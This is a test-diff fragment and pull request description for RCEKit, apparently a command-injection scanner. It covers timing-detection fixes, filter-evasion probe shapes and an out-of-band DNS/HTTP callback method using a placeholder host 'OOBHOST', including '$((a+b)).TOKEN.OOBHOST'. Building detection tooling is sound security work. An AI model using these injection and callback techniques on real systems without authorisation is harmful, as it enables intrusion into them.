+        gen = RCEKit()
+        rcekit.DETECTION_METHODS["endless"] = Endless
+        try:
+            def route(method, path, params, headers, body):
+                return 200, "ok"
+
+            with local_target(route) as base:
+                results = gen.run_detection(
+                    [make_record(environment="unix", context="raw")],
+                    url=f"{base}/x?q=FUZZ", methods=["endless"],
+                    config={"contexts_explicit": True})
+        finally:
+            del rcekit.DETECTION_METHODS["endless"]
+        self.assertEqual(len(results), 1)
+        self.assertIn(f"{RCEKit.MAX_PROBE_ROUNDS} probes fired", results[0]["detail"])
 
 
 if __name__ == "__main__":


### PR DESCRIPTION
Measured against a lab of twenty sinks — fifteen genuinely vulnerable, five deliberately clean — the results-based methods confirmed **8 of the 15**. The four they missed were not exotic: each was defeated by one ordinary filter. One clean sink was reported as a timing candidate on every single run.

After this change: **12 of 15 confirmed, 0 false positives on the clean five.**

## The false positive

`--methods time` fired its probes in a fixed ascending delay order (`0,0,N,N,2N,2N`), which makes the injected delay collinear with the request index. A target that simply gets **slower during the run** — progressive load, a rate limiter backing off, a filling log — therefore produced a textbook-perfect linear fit while being entirely un-injectable:

```
d=0s -> 2.50s, d=2s -> 4.50s, d=4s -> 6.50s   (reported as a blind timing candidate)
```

That sink contains no command execution anywhere. It reproduced on **8 of 8 runs**.

Randomising the probe order alone does **not** fix it: a drift of ~1s per request is the same order of magnitude as a 2s delay step, so random alignment still happens. The fix is to model the drift rather than hope it averages out — the request index enters the regression as a nuisance term alongside the injected delay:

```
elapsed ~ intercept + b_delay * delay + b_drift * index
```

A real sleep moves `b_delay` to ≈1.0 and leaves `b_drift` near zero; drift does the opposite. The same lab sink is now negative on **9 of 9 runs**, with every genuine timing detection preserved (5/5 on three vulnerable sinks). Closed-form least squares in pure Python — no new dependency.

## Added

**`--methods oob`** — the first `confirmed`-tier method for a sink that returns nothing *and* has no writable web root. Previously such a target topped out at `needs-review` forever. It drives the built-in HTTP+DNS listener in-process, asks the target to resolve or fetch `TOKEN.OOBHOST`, and judges each probe by whether its own token came back.

Each *separator* gets its own token, not each probe shape — sharing one would mark every separator confirmed as soon as any one called back, and a payload appended after `||` never runs when the preceding command succeeds, so the report would name payloads that did nothing. Verified against a blind sink: semicolon, pipe, chain-and and newline confirm; chain-or correctly stays negative.

The DNS shapes matter more than the HTTP ones, since egress filtering that blocks outbound HTTP usually still lets the resolver out. One shape puts a computed value in the label (`$((a+b)).TOKEN.OOBHOST`), so the callback proves the shell evaluated arithmetic rather than merely resolving a name it was handed. A bare IP for `--oob-host` puts the token in the URL path and skips the DNS shapes, rather than sending probes that could never call back.

Requires `--oob-host`, since it makes the target open outbound connections.

**`--probe-depth quick|full`** (default `full`) — trades requests for coverage. On a sink that strips `$(`: `quick` sends 34 probes and finds nothing, `full` sends 78 and confirms.

## Fixed

- **A `ping 'INPUT'` sink could not be detected at all.** The `shell_single_quoted`/`shell_double_quoted` contexts exist for exactly that shape — input interpolated inside quotes — but they are absent from `default_contexts`, so no record carried them and the engine never tried them. The one sink shape they exist for was the one shape that always reported clean. Now probed by default (2 extra probes), and skipped when `--contexts` names a selection explicitly: narrowing a run is a deliberate choice, and widening it behind the operator is not ours to make.
- **`--methods time` reported a `;`-filtering sink as negative** while piping into `sleep 3` demonstrably delayed 3s on it. A regression blends its probes into one measurement, so it cannot sweep separators the way the results-based methods do, and it was locked to `; `. It now screens every candidate with one cheap probe, then regresses through whichever one actually delayed.
- **A trailing redirect or pipe in the sink hid a working probe.** A sink shaped like `cmd INPUT 2>/dev/null`, or one that pipes the result into `grep`, swallows the output entirely — so the probe executed and still read as negative. The comment-terminated (`... #`) shapes comment that tail out. Skipped for `cmd.exe` and for contexts that close with their own suffix, where it would misfire.
- **Sinks that strip `$(` and backticks, or filter `echo`/`expr`, blocked both canonical probes.** `$((` starts with `$(`, so a single filter took out both the arithmetic and the substitution proof at once. The substitution-free `awk` and bare-`expr` shapes write the result straight to stdout and avoid the filtered words.

## Results

| | before | after |
|---|---|---|
| Vulnerable sinks confirmed (`reflected,eval`) | 8/15 | **12/15** |
| False positives on clean sinks | 0/3 | 0/3 |
| Requests per sink | 52 | 114 (`full`) / 70 (`quick`) |
| Timing FP on a drifting-latency target | 5/5 runs | **0/9 runs** |
| Timing on a `;`-filtering blind sink | negative | candidate |
| Fully blind sink | `needs-review` ceiling | **confirmed** via `oob` |

The three remaining misses are the two fully blind sinks — which `--methods oob` and `file` cover — and a space filter, which `--evade low` covers.

## Notes

- Version `2.21.1` to `2.22.0` (MINOR: new capabilities, no breaking change). README badge and `CHANGELOG.md` updated, including a re-check note for timing candidates produced by earlier versions.
- Tests: **204 to 235, all green.** 31 new; five existing tests that locked in behaviour this change deliberately alters were rewritten to encode the new intent rather than deleted.
- `--methods` without these flags behaves as before; `oob` is inert unless `--oob-host` is given.
